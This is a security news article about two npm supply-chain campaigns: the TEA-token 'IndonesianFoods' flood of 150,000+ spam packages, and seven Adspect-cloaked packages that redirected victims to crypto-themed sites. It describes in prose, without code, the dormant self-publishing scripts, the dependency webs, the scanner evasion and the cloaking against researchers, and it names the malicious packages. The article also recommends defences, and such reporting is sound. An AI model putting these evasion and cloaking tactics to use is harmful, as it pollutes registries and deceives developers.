- Large-scale npm flooding tied to TEA token rewards reached 150k+ packages, evolving from earlier waves of tens of thousands.
- Spam bundles used dormant scripts, patterned naming, and dependency webs to evade typical scanners.
- Coordinated response by Amazon Inspector and OpenSSF assigned MAL-IDs and mapped the campaign.
- Separate incident: seven Adspect-cloaked packages redirected victims to crypto-themed sites.
Amid growing scrutiny of open-source supply chains, the npm registry has been rattled by two distinct threats: a sprawling, incentive-driven package deluge tied to TEA token rewards and a smaller set of cloaked redirector packages that selectively target victims. Both campaigns lean on automation and subtlety, showing how quickly opportunists can exploit the world’s most widely used JavaScript ecosystem.
While the flooding effort swelled to more than 150,000 flagged packages across multiple accounts, the cloaked redirectors relied on anti-research tactics to hide in plain sight. Together, they highlight persistent gaps in registry governance, dependency hygiene, and detection strategies that focus too narrowly on traditional install-time malware behaviors.
Inside the IndonesianFoods package deluge
The campaign informally dubbed “IndonesianFoods” used a patterned naming scheme—pairing common Indonesian first names with food terms plus numeric variants—to mint thousands of plausible-looking packages. Earlier measurements identified about 43,000 entries tied to the effort; later reports cited more than 100,000, and subsequent sweeps uncovered over 150,000 across the registry.
Although many bundles appeared legitimate—some even shipped functional Next.js templates—they tucked away dormant code (e.g., auto.js or publishScript.js). When manually launched, that script randomized versions, generated new names, and published fresh packages on a loop, with bursts observed as fast as every few seconds and claims that a single run could push 17,000+ packages per day.
This mass production was rarely isolated; individual entries often declared eight to ten dependencies that pointed to other spam packages, creating a self-referential lattice. The net effect was a worm-like spread without relying on typical postinstall hooks or overtly malicious behaviors, which kept many scanners quiet.
Financial incentives appear to have fueled the effort. Researchers found tea.yaml files in attacker-controlled packages referencing specific accounts and crypto wallets, apparently aiming to juice TEA impact scores and claim token rewards. Analyses indicate a staged evolution: a large spam base in 2023, TEA monetization signals in 2024, and the highly automated replication workflow in 2025.
It’s worth noting that some research later clarified the replication is not fully autonomous; the payload needs to be triggered. Even so, once kicked off, the publishing loop and pattern-driven naming massively amplified volume and registry noise.
Detection, response, and the scale of registry pollution
Amazon Inspector researchers rolled out new rules paired with AI in late October and quickly flagged suspicious tea.xyz-linked activity. Within days, the team had identified thousands of entries; by mid-November, coordinated work with the Open Source Security Foundation led to MAL-IDs being assigned at pace—often within about 30 minutes—ultimately mapping 150k+ packages tied to the campaign.
Other security teams observed knock-on effects at scale. Data systems were strained by the volume of advisories being generated, and platforms that rely on vulnerability feeds reported waves of new entries related to the spam. Researchers characterized the event as unprecedented in size, warning that the high degree of automation and cross-account coordination makes response and cleanup more complex than typical one-off compromises.
Even without credential theft or backdoors, the risks are tangible: persistent registry pollution that drowns out legitimate packages, wasteful consumption of infrastructure and bandwidth, and a dangerous precedent that rewards volume over value. The tactic also creates space for threat actors to later slip in harmful updates amid the noise.
Why scanners missed it—and what’s changing
Most security tooling emphasizes install-time red flags such as postinstall scripts, network beacons, or suspicious file operations. Here, dormant files weren’t referenced by any code paths, so scanners frequently treated them as inert. A lack of rate limiting, weak metadata scrutiny, and limited pattern detection for bulk-published artifacts allowed two things to happen: high-throughput uploads went unchecked, and coordinated clusters stayed below the radar.
Researchers say the episode marks a shift toward ecosystem-level manipulation driven by monetary incentives. Instead of compromising a single popular package, attackers are incentivized to inflate influence across many small entries, obscuring signals and eroding trust. This is prompting calls for tougher registry policies, richer behavioral analytics, and better community coordination.
- Lock down publishing: restrict npm publish to CI/CD and authorized maintainers; require stronger identity checks for large-scale activity.
- Improve SCA coverage: flag dormant files, repeated patterns, and circular dependency webs; prefer tools that surface non-install-time risks.
- Constrain blast radius: pin versions, maintain SBOMs, and isolate CI/CD; add rate limits and CAPTCHA for mass submissions at the registry layer.
- Continuously audit: remove low-quality and non-functional packages; monitor for anomalous naming, version churn, and account clustering.
Adspect-cloaked redirector packages surface
A separate npm incident involved seven packages published by a user known as dino_reborn between September and November 2025. Six entries carried a compact, roughly 39kB payload that fingerprinted visitors and used a traffic-cloaking service called Adspect to filter out researchers, while “signals-embed” acted as a decoy.
- signals-embed (342 downloads)
- dsidospsodlks (184 downloads)
- applicationooks21 (340 downloads)
- application-phskck (199 downloads)
- integrator-filescrypt2025 (199 downloads)
- integrator-2829 (276 downloads)
- integrator-2830 (290 downloads)
The malicious code executed immediately when loaded in a browser environment via an Immediately Invoked Function Expression (IIFE). It harvested a system fingerprint, attempted to block developer tools to frustrate analysis, and consulted a proxy endpoint to decide whether to show a fake CAPTCHA that ultimately redirected victims to crypto-themed destinations impersonating services like StandX. If the visitor appeared to be a researcher, a plain white page—complete with references to a fake entity dubbed Offlido—was displayed instead.
Adspect markets itself as a cloud-based anti-fraud platform with “bulletproof cloaking,” offered via tiered subscription plans. Its presence inside supply-chain packages is unusual, and researchers argue that bundling Adspect logic with npm modules created a self-contained traffic-gating toolkit: distribution through a developer channel, execution in the browser, and selective exposure of the real payload only to likely victims.
Practical steps for teams and registries
For development teams, the safest immediate moves are to tighten publishing controls, prefer detectors that catch dormant artifacts, and cull questionable packages from dependency trees. For registry stewards, adding submission throttles, improving metadata analysis, and baking in anomaly detection for naming patterns and cross-account clustering should raise the bar for would-be spammers.
Amid shifting incentives and increasingly industrialized tactics, npm’s defenders face a different kind of challenge: when attackers can earn by flooding rather than infecting, the line between nuisance and risk narrows—and vigilance, collaboration, and smarter controls become the only sustainable response.
